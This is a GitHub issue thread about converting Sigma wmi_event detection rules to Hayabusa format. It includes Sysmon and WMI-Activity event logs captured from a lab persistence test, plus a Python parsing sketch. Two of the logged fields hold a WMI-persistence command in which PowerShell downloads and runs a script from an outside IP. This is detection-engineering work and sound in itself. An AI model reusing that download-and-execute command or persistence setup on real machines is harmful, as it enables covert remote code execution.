Yamato-Security / sigma-to-hayabusa-converter

Documentation and tools to curate Sigma rules for Windows event logs into easier to parse rules.
GNU General Public License v3.0

Investigate conversion of `wmi_event` events #12

Open YamatoSecurity opened 1 month ago

YamatoSecurity commented 1 month ago

We may be able to convert wmi_event categories to handle built-in WMI logs.

fukusuket commented 1 month ago

memo:

fukusuket commented 1 month ago

Sysmon 19 WmiEventFilter activity detected

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
  <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> 
  <EventID>19</EventID> 
  <Version>3</Version> 
  <Level>4</Level> 
  <Task>19</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x8000000000000000</Keywords> 
  <TimeCreated SystemTime="2024-09-06T06:52:30.642415500Z" /> 
  <EventRecordID>2174</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="2296" ThreadID="3500" /> 
  <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
  <Computer>win10</Computer> 
  <Security UserID="S-1-5-18" /> 
  </System>
<EventData>
  <Data Name="RuleName">technique_id=T1047,technique_name=Windows Management Instrumentation</Data> 
  <Data Name="EventType">WmiFilterEvent</Data> 
  <Data Name="UtcTime">2024-09-06 06:52:30.636</Data> 
  <Data Name="Operation">Created</Data> 
  <Data Name="User">WIN10\vagrant</Data> 
  <Data Name="EventNamespace">"root/cimv2"</Data> 
  <Data Name="Name">"Cleanup"</Data> 
  <Data Name="Query">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"</Data> 
  </EventData>
  </Event>
fukusuket commented 1 month ago

Sysmon 20 WmiEventConsumer activity detected

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
  <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> 
  <EventID>20</EventID> 
  <Version>3</Version> 
  <Level>4</Level> 
  <Task>20</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x8000000000000000</Keywords> 
  <TimeCreated SystemTime="2024-09-06T06:52:30.650332200Z" /> 
  <EventRecordID>2175</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="2296" ThreadID="3500" /> 
  <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
  <Computer>win10</Computer> 
  <Security UserID="S-1-5-18" /> 
  </System>
<EventData>
  <Data Name="RuleName">technique_id=T1047,technique_name=Windows Management Instrumentation</Data> 
  <Data Name="EventType">WmiConsumerEvent</Data> 
  <Data Name="UtcTime">2024-09-06 06:52:30.649</Data> 
  <Data Name="Operation">Created</Data> 
  <Data Name="User">WIN10\vagrant</Data> 
  <Data Name="Name">"DataCleanup"</Data> 
  <Data Name="Type">Command Line</Data> 
  <Data Name="Destination">"powershell.exe -nop -c \"IEX ((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))\""</Data> 
  </EventData>
  </Event>
fukusuket commented 1 month ago

Sysmon 21 WmiEventConsumerToFilter activity detected

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
  <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> 
  <EventID>21</EventID> 
  <Version>3</Version> 
  <Level>4</Level> 
  <Task>21</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x8000000000000000</Keywords> 
  <TimeCreated SystemTime="2024-09-06T06:54:19.794672300Z" /> 
  <EventRecordID>2202</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="2296" ThreadID="2884" /> 
  <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
  <Computer>win10</Computer> 
  <Security UserID="S-1-5-18" /> 
  </System>
<EventData>
  <Data Name="RuleName">technique_id=T1047,technique_name=Windows Management Instrumentation</Data> 
  <Data Name="EventType">WmiBindingEvent</Data> 
  <Data Name="UtcTime">2024-09-06 06:54:19.791</Data> 
  <Data Name="Operation">Created</Data> 
  <Data Name="User">WIN10\vagrant</Data> 
  <Data Name="Consumer">"CommandLineEventConsumer.Name=\"DataCleanup\""</Data> 
  <Data Name="Filter">"__EventFilter.Name=\"Cleanup\""</Data> 
  </EventData>
  </Event>
fukusuket commented 6 days ago

Microsoft-Windows-WMI-Activity 5861

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
  <Provider Name="Microsoft-Windows-WMI-Activity" Guid="{1418ef04-b0b4-4623-bf7e-d74ab47bbdaa}" /> 
  <EventID>5861</EventID> 
  <Version>0</Version> 
  <Level>0</Level> 
  <Task>0</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x4000000000000000</Keywords> 
  <TimeCreated SystemTime="2024-09-06T06:52:30.676491600Z" /> 
  <EventRecordID>252</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="364" ThreadID="5520" /> 
  <Channel>Microsoft-Windows-WMI-Activity/Operational</Channel> 
  <Computer>win10</Computer> 
  <Security UserID="S-1-5-18" /> 
  </System>
<UserData>
 <Operation_ESStoConsumerBinding xmlns="http://manifests.microsoft.com/win/2006/windows/WMI">
  <Namespace>//./root/subscription</Namespace> 
  <ESS>Cleanup</ESS> 
  <CONSUMER>CommandLineEventConsumer="DataCleanup"</CONSUMER> 
  <PossibleCause>Binding EventFilter: instance of __EventFilter { CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 97, 86, 74, 143, 112, 190, 99, 243, 226, 31, 52, 33, 232, 3, 0, 0}; EventNamespace = "root/cimv2"; Name = "Cleanup"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"; QueryLanguage = "WQL"; }; Perm. Consumer: instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -nop -c \"IEX ((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))\""; CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 97, 86, 74, 143, 112, 190, 99, 243, 226, 31, 52, 33, 232, 3, 0, 0}; Name = "DataCleanup"; };</PossibleCause> 
  </Operation_ESStoConsumerBinding>
  </UserData>
  </Event>
fukusuket commented 6 days ago

Current Sigma repo's wmi_event rule

fukusuket commented 6 days ago

The following events were recorded after running Install-Persistence in this script.

I checked with https://github.com/Yamato-Security/sigma-to-hayabusa-converter/issues/12#issuecomment-2333422689 and found that Sysmon rules only use Event_ID and Destination fields, so it seems that only conversion of these two fields is needed. The conversion logic is as follows:

@YamatoSecurity What do you think?
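As an added example (not code from this issue or from the converter project), the mapping the comment above describes, sketched in Python: the WMI-Activity 5861 event's PossibleCause text is projected onto the Sysmon 20/21 field names (Destination, Name, Query, Consumer, Filter) that the Sigma wmi_event rules key on, so a Destination-based selection can be evaluated against the built-in WMI log as well. The sample event is constructed and abbreviated from the 5861 event quoted earlier; the MOF-text parsing is an assumption derived from that one sample's shape, not from a documented format.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event",
      "w": "http://manifests.microsoft.com/win/2006/windows/WMI"}
# Quoted MOF properties inside PossibleCause look like: Key = "value with \" escapes";
FIELD_RE = re.compile(r'(\w+) = "((?:[^"\\]|\\.)*)";')

# Constructed sample, abbreviated from the 5861 event quoted earlier in this issue.
SAMPLE_5861 = r'''<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>5861</EventID><Channel>Microsoft-Windows-WMI-Activity/Operational</Channel></System>
<UserData><Operation_ESStoConsumerBinding xmlns="http://manifests.microsoft.com/win/2006/windows/WMI">
<Namespace>//./root/subscription</Namespace><ESS>Cleanup</ESS>
<CONSUMER>CommandLineEventConsumer="DataCleanup"</CONSUMER>
<PossibleCause>Binding EventFilter: instance of __EventFilter { CreatorSID = {1, 5, 0, 0}; EventNamespace = "root/cimv2"; Name = "Cleanup"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60"; QueryLanguage = "WQL"; }; Perm. Consumer: instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -nop -c \"IEX (x)\""; CreatorSID = {1, 5, 0, 0}; Name = "DataCleanup"; };</PossibleCause>
</Operation_ESStoConsumerBinding></UserData></Event>'''


def parse_possible_cause(text):
    """Return {mof_class: {property: value}} for each 'instance of' block (assumed layout)."""
    instances = {}
    for chunk in text.split("instance of ")[1:]:
        cls, _, body = chunk.partition(" {")
        instances[cls] = {k: v.replace('\\"', '"') for k, v in FIELD_RE.findall(body)}
    return instances


def to_sysmon_fields(xml_text):
    """Project a 5861 binding event onto the Sysmon 20 (Destination, Name) and 21 (Consumer, Filter) field names."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "5861":
        return None
    cause = root.findtext("e:UserData/w:Operation_ESStoConsumerBinding/w:PossibleCause", namespaces=NS) or ""
    inst = parse_possible_cause(cause)
    filt = inst.get("__EventFilter", {})
    consumer_cls = next((c for c in inst if c.endswith("EventConsumer")), "")
    consumer = inst.get(consumer_cls, {})
    return {
        "EventID": 5861,
        # Sysmon 20 carries the CommandLineTemplate of a CommandLineEventConsumer
        # (or the ScriptText of an ActiveScriptEventConsumer) in Destination.
        "Destination": consumer.get("CommandLineTemplate") or consumer.get("ScriptText"),
        "Name": consumer.get("Name"),
        "Query": filt.get("Query"),
        # Sysmon 21 formats the binding pair as Class.Name="..."; rebuild that shape here.
        "Consumer": f'{consumer_cls}.Name="{consumer.get("Name", "")}"',
        "Filter": f'__EventFilter.Name="{filt.get("Name", "")}"',
    }


def destination_contains_all(fields, needles):
    """Evaluate a Sigma 'Destination|contains|all' selection (case-insensitive, as Sigma is)."""
    dest = (fields or {}).get("Destination") or ""
    return all(n.lower() in dest.lower() for n in needles)
```

Non-5861 events return None, so a converted rule that targets Microsoft-Windows-WMI-Activity/Operational still needs an EventID selection alongside the Destination one.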